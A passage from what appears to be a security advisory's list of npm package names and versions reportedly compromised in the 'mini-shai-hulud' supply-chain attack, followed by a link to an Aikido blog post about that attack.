  • @antv/scale: 0.6.2, 0.7.2
  • @antv/semantic-release-pnpm: 1.1.4, 1.2.4
  • @antv/smart-color: 0.3.1, 0.4.1
  • @antv/stat: 0.1.2, 0.2.2
  • @antv/t8: 0.4.0, 0.5.0
  • @antv/thumbnails: 2.1.0, 2.2.0
  • @antv/thumbnails-component: 2.1.0, 2.2.0
  • @antv/torch: 1.1.6, 1.2.6
  • @antv/translator: 1.1.1, 1.2.1
  • @antv/util: 3.4.11, 3.5.11
  • @antv/vendor: 1.1.11, 1.2.11
  • @antv/vis-predict-engine: 0.2.1, 0.3.1
  • @antv/webgpu-graph: 1.1.0, 1.2.0
  • @antv/word-scale-chart: 0.4.4, 0.5.4
  • @antv/wx-f2: 2.2.1, 2.3.1
  • @antv/x6: 3.2.7, 3.3.7
  • @antv/x6-angular-shape: 3.1.1, 3.2.1
  • @antv/x6-common: 2.1.17, 2.2.17
  • @antv/x6-components: 0.11.7, 0.12.7
  • @antv/x6-geometry: 2.1.5, 2.2.5
  • @antv/x6-plugin-clipboard: 2.2.6, 2.3.6
  • @antv/x6-plugin-dnd: 2.2.1, 2.3.1
  • @antv/x6-plugin-export: 2.2.6, 2.3.6
  • @antv/x6-plugin-history: 2.3.4, 2.4.4
  • @antv/x6-plugin-keyboard: 2.3.3, 2.4.3
  • @antv/x6-plugin-minimap: 2.1.7, 2.2.7
  • @antv/x6-plugin-scroller: 2.1.10, 2.2.10
  • @antv/x6-plugin-selection: 2.3.2, 2.4.2
  • @antv/x6-plugin-snapline: 2.2.7, 2.3.7
  • @antv/x6-plugin-stencil: 2.2.5, 2.3.5
  • @antv/x6-plugin-transform: 2.2.8, 2.3.8
  • @antv/x6-react: 0.2.26, 0.3.26
  • @antv/x6-react-components: 2.1.9, 2.2.9
  • @antv/x6-react-shape: 3.1.1, 3.2.1
  • @antv/x6-vector: 1.5.2, 1.6.2
  • @antv/x6-vue-shape: 3.1.2, 3.2.2
  • @antv/x6-vue3-shape: 1.1.0, 1.2.0
  • @antv/xflow: 2.2.13, 2.3.13
  • @antv/xflow-core: 1.1.55, 1.2.55
  • @antv/xflow-diff: 1.1.0, 1.2.0
  • @antv/xflow-extension: 1.1.55, 1.2.55
  • @antv/xflow-hook: 1.1.55, 1.2.55
  • @beproduct/nestjs-auth: 0.1.10, 0.1.11, 0.1.12, 0.1.13, 0.1.14, 0.1.15, 0.1.16, 0.1.17, 0.1.18, 0.1.19, 0.1.2, 0.1.3, 0.1.4, 0.1.5, 0.1.6, 0.1.7, 0.1.8, 0.1.9
  • @cap-js/db-service: 2.10.1
  • @cap-js/postgres: 2.2.2
  • @cap-js/sqlite: 2.2.2
  • @dirigible-ai/sdk: 0.6.2, 0.6.3
  • @draftauth/client: 0.2.1, 0.2.2
  • @draftauth/core: 0.13.1, 0.13.2
  • @draftlab/auth: 0.24.1, 0.24.2
  • @draftlab/auth-router: 0.5.1, 0.5.2
  • @draftlab/db: 0.16.1, 0.16.2
  • @intercom/intercom-php: 5.0.2
  • @lint-md/cli: 2.1.0, 2.2.0
  • @lint-md/core: 2.1.0, 2.2.0
  • @lint-md/parser: 0.1.14, 0.2.14
  • @mesadev/rest: 0.28.3
  • @mesadev/saguaro: 0.4.22
  • @mesadev/sdk: 0.28.3
  • @mistralai/mistralai: 2.2.2, 2.2.3, 2.2.4
  • @mistralai/mistralai-azure: 1.7.1, 1.7.2, 1.7.3
  • @mistralai/mistralai-gcp: 1.7.1, 1.7.2, 1.7.3
  • @ml-toolkit-ts/preprocessing: 1.0.2, 1.0.3
  • @ml-toolkit-ts/xgboost: 1.0.3, 1.0.4
  • @openclaw-cn/cli: 1.4.1
  • @openclaw-cn/feishu: 0.2.11
  • @openclaw-cn/libsignal: 2.1.1
  • @openclaw-cn/toutiao-ops: 1.2.4
  • @opensearch-project/opensearch: 3.5.3, 3.6.2, 3.7.0, 3.8.0
  • @squawk/airport-data: 0.7.4, 0.7.5, 0.7.6, 0.7.7, 0.7.8
  • @squawk/airports: 0.6.2, 0.6.3, 0.6.4, 0.6.5, 0.6.6
  • @squawk/airspace: 0.8.1, 0.8.2, 0.8.3, 0.8.4, 0.8.5
  • @squawk/airspace-data: 0.5.3, 0.5.4, 0.5.5, 0.5.6, 0.5.7
  • @squawk/airway-data: 0.5.4, 0.5.5, 0.5.6, 0.5.7, 0.5.8
  • @squawk/airways: 0.4.2, 0.4.3, 0.4.4, 0.4.5, 0.4.6
  • @squawk/fix-data: 0.6.4, 0.6.5, 0.6.6, 0.6.7, 0.6.8
  • @squawk/fixes: 0.3.2, 0.3.3, 0.3.4, 0.3.5, 0.3.6
  • @squawk/flight-math: 0.5.4, 0.5.5, 0.5.6, 0.5.7, 0.5.8
  • @squawk/flightplan: 0.5.2, 0.5.3, 0.5.4, 0.5.5, 0.5.6
  • @squawk/geo: 0.4.4, 0.4.5, 0.4.6, 0.4.7, 0.4.8
  • @squawk/icao-registry: 0.5.2, 0.5.3, 0.5.4, 0.5.5, 0.5.6
  • @squawk/icao-registry-data: 0.8.4, 0.8.5, 0.8.6, 0.8.7, 0.8.8
  • @squawk/mcp: 0.9.1, 0.9.2, 0.9.3, 0.9.4, 0.9.5
  • @squawk/navaid-data: 0.6.4, 0.6.5, 0.6.6, 0.6.7, 0.6.8
  • @squawk/navaids: 0.4.2, 0.4.3, 0.4.4, 0.4.5, 0.4.6
  • @squawk/notams: 0.3.10, 0.3.6, 0.3.7, 0.3.8, 0.3.9
  • @squawk/procedure-data: 0.7.3, 0.7.4, 0.7.5, 0.7.6, 0.7.7
  • @squawk/procedures: 0.5.2, 0.5.3, 0.5.4, 0.5.5, 0.5.6
  • @squawk/types: 0.8.1, 0.8.2, 0.8.3, 0.8.4, 0.8.5
  • @squawk/units: 0.4.3, 0.4.4, 0.4.5, 0.4.6, 0.4.7
  • @squawk/weather: 0.5.10, 0.5.6, 0.5.7, 0.5.8, 0.5.9
  • @starmind/collector-cli: 0.3.10
  • @supersurkhet/cli: 0.0.2, 0.0.3, 0.0.4, 0.0.5, 0.0.6, 0.0.7
  • @supersurkhet/sdk: 0.0.2, 0.0.3, 0.0.4, 0.0.5, 0.0.6, 0.0.7
  • @tallyui/components: 1.0.1, 1.0.2, 1.0.3
  • @tallyui/connector-medusa: 1.0.1, 1.0.2, 1.0.3
  • @tallyui/connector-shopify: 1.0.1, 1.0.2, 1.0.3
  • @tallyui/connector-vendure: 1.0.1, 1.0.2, 1.0.3
  • @tallyui/connector-woocommerce: 1.0.1, 1.0.2, 1.0.3
  • @tallyui/core: 0.2.1, 0.2.2, 0.2.3
  • @tallyui/database: 1.0.1, 1.0.2, 1.0.3
  • @tallyui/pos: 0.1.1, 0.1.2, 0.1.3
  • @tallyui/storage-sqlite: 0.2.1, 0.2.2, 0.2.3
  • @tallyui/theme: 0.2.1, 0.2.2, 0.2.3
  • @tanstack/arktype-adapter: 1.166.12, 1.166.15
  • @tanstack/eslint-plugin-router: 1.161.12, 1.161.9
  • @tanstack/eslint-plugin-start: 0.0.4, 0.0.7
  • @tanstack/history: 1.161.12, 1.161.9
  • @tanstack/nitro-v2-vite-plugin: 1.154.12, 1.154.15
  • @tanstack/react-router: 1.169.5, 1.169.8
  • @tanstack/react-router-devtools: 1.166.16, 1.166.19
  • @tanstack/react-router-ssr-query: 1.166.15, 1.166.18
  • @tanstack/react-start: 1.167.68, 1.167.71
  • @tanstack/react-start-client: 1.166.51, 1.166.54
  • @tanstack/react-start-rsc: 0.0.47, 0.0.50
  • @tanstack/react-start-server: 1.166.55, 1.166.58
  • @tanstack/router-cli: 1.166.46, 1.166.49
  • @tanstack/router-core: 1.169.5, 1.169.8
  • @tanstack/router-devtools: 1.166.16, 1.166.19
  • @tanstack/router-devtools-core: 1.167.6, 1.167.9
  • @tanstack/router-generator: 1.166.45, 1.166.48
  • @tanstack/router-plugin: 1.167.38, 1.167.41
  • @tanstack/router-ssr-query-core: 1.168.3, 1.168.6
  • @tanstack/router-utils: 1.161.11, 1.161.14
  • @tanstack/router-vite-plugin: 1.166.53, 1.166.56
  • @tanstack/solid-router: 1.169.5, 1.169.8
  • @tanstack/solid-router-devtools: 1.166.16, 1.166.19
  • @tanstack/solid-router-ssr-query: 1.166.15, 1.166.18
  • @tanstack/solid-start: 1.167.65, 1.167.68
  • @tanstack/solid-start-client: 1.166.50, 1.166.53
  • @tanstack/solid-start-server: 1.166.54, 1.166.57
  • @tanstack/start-client-core: 1.168.5, 1.168.8
  • @tanstack/start-fn-stubs: 1.161.12, 1.161.9
  • @tanstack/start-plugin-core: 1.169.23, 1.169.26
  • @tanstack/start-server-core: 1.167.33, 1.167.36
  • @tanstack/start-static-server-functions: 1.166.44, 1.166.47
  • @tanstack/start-storage-context: 1.166.38, 1.166.41
  • @tanstack/valibot-adapter: 1.166.12, 1.166.15
  • @tanstack/virtual-file-routes: 1.161.10, 1.161.13
  • @tanstack/vue-router: 1.169.5, 1.169.8
  • @tanstack/vue-router-devtools: 1.166.16, 1.166.19
  • @tanstack/vue-router-ssr-query: 1.166.15, 1.166.18
  • @tanstack/vue-start: 1.167.61, 1.167.64
  • @tanstack/vue-start-client: 1.166.46, 1.166.49
  • @tanstack/vue-start-server: 1.166.50, 1.166.53
  • @tanstack/zod-adapter: 1.166.12, 1.166.15
  • @taskflow-corp/cli: 0.1.24, 0.1.25, 0.1.26, 0.1.27, 0.1.28, 0.1.29
  • @tolka/cli: 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.0.6
  • @uipath/access-policy-sdk: 0.3.1
  • @uipath/access-policy-tool: 0.3.1
  • @uipath/admin-tool: 0.1.1
  • @uipath/agent-sdk: 1.0.2
  • @uipath/agent-tool: 1.0.1
  • @uipath/agent.sdk: 0.0.18
  • @uipath/aops-policy-tool: 0.3.1
  • @uipath/ap-chat: 1.5.7
  • @uipath/api-workflow-tool: 1.0.1
  • @uipath/apollo-core: 5.9.2
  • @uipath/apollo-react: 4.24.5
  • @uipath/apollo-wind: 2.16.2
  • @uipath/auth: 1.0.1
  • @uipath/case-tool: 1.0.1
  • @uipath/cli: 1.0.1
  • @uipath/codedagent-tool: 1.0.1
  • @uipath/codedagents-tool: 0.1.12
  • @uipath/codedapp-tool: 1.0.1
  • @uipath/common: 1.0.1
  • @uipath/context-grounding-tool: 0.1.1
  • @uipath/data-fabric-tool: 1.0.2
  • @uipath/docsai-tool: 1.0.1
  • @uipath/filesystem: 1.0.1
  • @uipath/flow-tool: 1.0.2
  • @uipath/functions-tool: 1.0.1
  • @uipath/gov-tool: 0.3.1
  • @uipath/identity-tool: 0.1.1
  • @uipath/insights-sdk: 1.0.1
  • @uipath/insights-tool: 1.0.1
  • @uipath/integrationservice-sdk: 1.0.2
  • @uipath/integrationservice-tool: 1.0.2
  • @uipath/llmgw-tool: 1.0.1
  • @uipath/maestro-sdk: 1.0.1
  • @uipath/maestro-tool: 1.0.1
  • @uipath/orchestrator-tool: 1.0.1
  • @uipath/packager-tool-apiworkflow: 0.0.19
  • @uipath/packager-tool-bpmn: 0.0.9
  • @uipath/packager-tool-case: 0.0.9
  • @uipath/packager-tool-connector: 0.0.19
  • @uipath/packager-tool-flow: 0.0.19
  • @uipath/packager-tool-functions: 0.1.1
  • @uipath/packager-tool-webapp: 1.0.6
  • @uipath/packager-tool-workflowcompiler: 0.0.16
  • @uipath/packager-tool-workflowcompiler-browser: 0.0.34
  • @uipath/platform-tool: 1.0.1
  • @uipath/project-packager: 1.1.16
  • @uipath/resource-tool: 1.0.1
  • @uipath/resourcecatalog-tool: 0.1.1
  • @uipath/resources-tool: 0.1.11
  • @uipath/robot: 1.3.4
  • @uipath/rpa-legacy-tool: 1.0.1
  • @uipath/rpa-tool: 0.9.5
  • @uipath/solution-packager: 0.0.35
  • @uipath/solution-tool: 1.0.1
  • @uipath/solutionpackager-sdk: 1.0.11
  • @uipath/solutionpackager-tool-core: 0.0.34
  • @uipath/tasks-tool: 1.0.1
  • @uipath/telemetry: 0.0.7
  • @uipath/test-manager-tool: 1.0.2
  • @uipath/tool-workflowcompiler: 0.0.12
  • @uipath/traces-tool: 1.0.1
  • @uipath/ui-widgets-multi-file-upload: 1.0.1
  • @uipath/uipath-python-bridge: 1.0.1
  • @uipath/vertical-solutions-tool: 1.0.1
  • @uipath/vss: 0.1.6
  • @uipath/widget.sdk: 1.2.3
  • agentwork-cli: 0.1.4, 0.1.5
  • ai-figure: 0.5.0, 0.6.0
  • amapcn: 0.2.2, 0.3.2
  • ast-plugin: 0.1.7, 0.2.7
  • babel-plugin-version: 0.3.3, 0.4.3
  • boring-avatars-vanilla: 1.1.2, 1.2.2
  • byte-parser: 1.1.0, 1.2.0
  • canvas-nest.js: 2.1.4, 2.2.4
  • cmux-agent-mcp: 0.1.3, 0.1.4, 0.1.5, 0.1.6, 0.1.7, 0.1.8
  • cross-stitch: 1.1.3, 1.1.4, 1.1.5, 1.1.6, 1.1.7
  • echarts-for-react: 3.1.7, 3.2.7
  • filesize.js: 2.1.0, 2.2.0
  • fixed-round: 1.1.2, 1.2.2
  • gantt-for-react: 0.3.0, 0.4.0
  • git-branch-selector: 1.3.3, 1.3.4, 1.3.5, 1.3.6, 1.3.7
  • git-git-git: 1.0.10, 1.0.11, 1.0.12, 1.0.8, 1.0.9
  • guardrails-ai: 0.10.1
  • intercom-client: 7.0.4
  • jest-canvas-mock: 2.6.3, 2.7.3
  • jest-date-mock: 1.1.11, 1.2.11
  • jest-electron: 0.2.12, 0.3.12
  • jest-expect: 0.1.1, 0.2.1
  • jest-less-loader: 0.3.0, 0.4.0
  • jest-random-mock: 1.1.0, 1.2.0
  • jest-url-loader: 0.2.0, 0.3.0
  • lightning: 2.6.2, 2.6.3
  • limit-size: 0.2.4, 0.3.4
  • lint-md: 0.3.0, 0.4.0
  • lint-md-cli: 0.2.2, 0.3.2
  • mbt: 1.2.48
  • mcp-echarts: 0.8.1, 0.9.1
  • mcp-mermaid: 0.5.1, 0.6.1
  • mistralai: 2.4.6
  • miz: 1.1.1, 1.2.1
  • ml-toolkit-ts: 1.0.4, 1.0.5
  • nextmove-mcp: 0.1.3, 0.1.4, 0.1.5, 0.1.6, 0.1.7
  • onfire.js: 2.1.1, 2.2.1
  • openclaw-cn: 0.3.0
  • react-adsense: 0.2.0, 0.3.0
  • relationship.js: 1.3.9, 1.4.9
  • ribbon.js: 1.1.2
  • safe-action: 0.8.3, 0.8.4
  • size-sensor: 1.1.4, 1.2.4
  • slice.js: 1.2.1, 1.3.1
  • timeago-react: 3.1.7, 3.2.7
  • timeago.js: 4.1.2, 4.2.2
  • ts-dna: 3.0.1, 3.0.2, 3.0.3, 3.0.4, 3.0.5
  • uri-parse: 1.1.0, 1.2.0
  • word-width: 1.1.1, 1.2.1
  • wot-api: 0.8.1, 0.8.2, 0.8.3, 0.8.4
  • xmorse: 1.1.0, 1.2.0
https://www.aikido.dev/blog/mini-shai-hulud-antv-npm-supply-chain-attack
